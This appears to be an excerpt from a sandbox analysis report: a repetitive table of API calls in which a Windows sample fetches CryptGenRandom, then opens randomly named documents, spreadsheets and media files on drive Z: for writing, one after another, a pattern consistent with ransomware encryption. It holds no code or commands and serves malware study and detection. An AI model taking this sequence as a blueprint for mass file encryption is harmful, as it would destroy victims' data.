| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\vJvHFLFe.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9Mb9yKA.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\9Mb9yKA.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\30yCZTi8h1x.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\30yCZTi8h1x.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\zKrYkW7P9h.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\zKrYkW7P9h.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\UX0CIrthkmniE.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\UX0CIrthkmniE.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\aWJXG7BTk6.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\aWJXG7BTk6.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\XvsUo.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\XvsUo.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\haBoE0.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\haBoE0.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\yUtPCopr3.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\yUtPCopr3.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\OUzRKAK.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\OUzRKAK.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\dHSAr.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\dHSAr.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\2V4nNeRhoBFj576c7yH.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\2V4nNeRhoBFj576c7yH.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\42d71SFHtTn0.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\42d71SFHtTn0.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\cRZ0MtepZOGtVnmrc.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\cRZ0MtepZOGtVnmrc.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Nu17HJT.doc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Nu17HJT.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\DTxMcdBSiMydDh.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\DTxMcdBSiMydDh.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\PD2J8WWYx87xI0ZI.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\PD2J8WWYx87xI0ZI.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\T8EpXefSMHECv.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\T8EpXefSMHECv.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Pwx0NeK5H26N3X7a.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Pwx0NeK5H26N3X7a.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\N56ssz.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\N56ssz.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\FwXHW.ods, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\FwXHW.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\BQFGGXzv3.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\BQFGGXzv3.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Dj56CGtKFxmm4j0.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Dj56CGtKFxmm4j0.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\uxr0VgIKyabrfeDqhyX.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\uxr0VgIKyabrfeDqhyX.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\LfWkkMwiKa4.ods, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\LfWkkMwiKa4.ods, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\IT6h99wlQ8kMSRWY.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\IT6h99wlQ8kMSRWY.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZURHdOemF1Sio2JJg0.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZURHdOemF1Sio2JJg0.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\DLkdqSFl1CQPIWIFI.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\DLkdqSFl1CQPIWIFI.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\0l49yVa27V3fbp0.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\0l49yVa27V3fbp0.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\QoeoAcaeeahNH1u.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\QoeoAcaeeahNH1u.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\bmZb8.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\bmZb8.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ePjafyFSVAy.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ePjafyFSVAy.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\n1oIgSCOHCUfCFKnMot5.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\n1oIgSCOHCUfCFKnMot5.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\mW4UoHVdQjsL.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\mW4UoHVdQjsL.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\o31FKcUml.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\o31FKcUml.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Kh4ML0UlDG8G3xTW7.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Kh4ML0UlDG8G3xTW7.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\QahKCn8ueyqJ7tcTfc.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\QahKCn8ueyqJ7tcTfc.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\V2B1F8D.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\V2B1F8D.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\4yXte0uXIFucLv4.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
